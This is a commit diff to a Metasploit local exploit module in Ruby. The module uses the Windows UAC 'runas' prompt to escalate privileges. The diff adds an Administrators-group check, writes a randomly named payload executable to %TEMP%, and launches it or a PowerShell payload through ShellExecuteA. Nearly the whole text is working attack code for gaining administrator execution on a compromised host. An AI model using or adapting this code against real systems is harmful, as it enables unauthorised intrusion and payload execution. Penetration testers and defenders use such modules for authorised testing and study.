Merge branch 'local/ask'

bug/bundler_fix
b00stfr3ak 2013-10-22 16:06:16 -07:00
commit a06c0a9575
1 changed files with 53 additions and 43 deletions

View File

@ -40,14 +40,42 @@ class Metasploit3 < Msf::Exploit::Local
register_options([ register_options([
OptString.new("FILENAME", [ false, "File name on disk"]), OptString.new("FILENAME", [ false, "File name on disk"]),
OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]), OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]), OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]), OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
]) ])
end end
def check
session.readline
print_status('Checking admin status...')
whoami = session.sys.process.execute('cmd /c whoami /groups',
nil,
{'Hidden' => true, 'Channelized' => true}
)
cmdout = []
while(cmdoutput = whoami.channel.read)
cmdout << cmdoutput
end
if cmdout.size == 0
fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute")
else
isinadmins = cmdout.join.scan(/S-1-5-32-544/)
if isinadmins.size > 0
print_good('Part of Administrators group! Continuing...')
return Exploit::CheckCode::Vulnerable
else
print_error('Not in admins group, cannot escalate with this module')
print_error('Exiting...')
return Exploit::CheckCode::Safe
end
end
end
def exploit def exploit
admin_check = check
if admin_check.join =~ /safe/
return Exploit::CheckCode::Safe
end
root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
open_key = session.sys.registry.open_key(root_key, base_key) open_key = session.sys.registry.open_key(root_key, base_key)
lua_setting = open_key.query_value('EnableLUA') lua_setting = open_key.query_value('EnableLUA')
@ -61,56 +89,38 @@ class Metasploit3 < Msf::Exploit::Local
uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
case uac_level.data case uac_level.data
when 2 when 2
print_status "UAC is set to 'Always Notify'" print_status "UAC is set to 'Always Notify'"
print_status "The user will be prompted, wait for them to click 'Ok'" print_status "The user will be prompted, wait for them to click 'Ok'"
when 5 when 5
print_debug "UAC is set to Default" print_debug "UAC is set to Default"
print_debug "The user will be prompted, wait for them to click 'Ok'" print_debug "The user will be prompted, wait for them to click 'Ok'"
when 0 when 0
print_good "UAC is not enabled, no prompt for the user" print_good "UAC is not enabled, no prompt for the user"
end end
# #
# Generate payload and random names for upload # Generate payload and random names for upload
# #
case datastore["TECHNIQUE"]
if datastore["TECHNIQUE"] == "EXE" when "EXE"
if datastore["UPLOAD"] exe_payload = generate_payload_exe
exe_payload = generate_exe_payload_exe payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
payload_path = datastore["PATH"] || expand_path("%TEMP%")
if datastore["FILENAME"]
payload_filename = datastore["FILENAME"]
else
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
end
if datastore["PATH"]
payload_path = datastore["PATH"]
else
payload_path = session.fs.file.expand_path("%TEMP%")
end
cmd_location = "#{payload_path}\\#{payload_filename}" cmd_location = "#{payload_path}\\#{payload_filename}"
if datastore["UPLOAD"] if datastore["UPLOAD"]
print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...") print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
fd = session.fs.file.new(cmd_location, "wb") write_file(cmd_location, exe_payload)
fd.write(exe_payload) else
fd.close #print_error("No Upload Path!")
fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
return
end end
command, args = cmd_location,nil
session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5) session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
else when "PSH"
print_error("No Upload Path!") command, args = "cmd.exe", " /c #{cmd_psh_payload(payload.encoded)}"
return
end
else
command = cmd_psh_payload(payload.encoded)
arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
end end
session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
end end
end end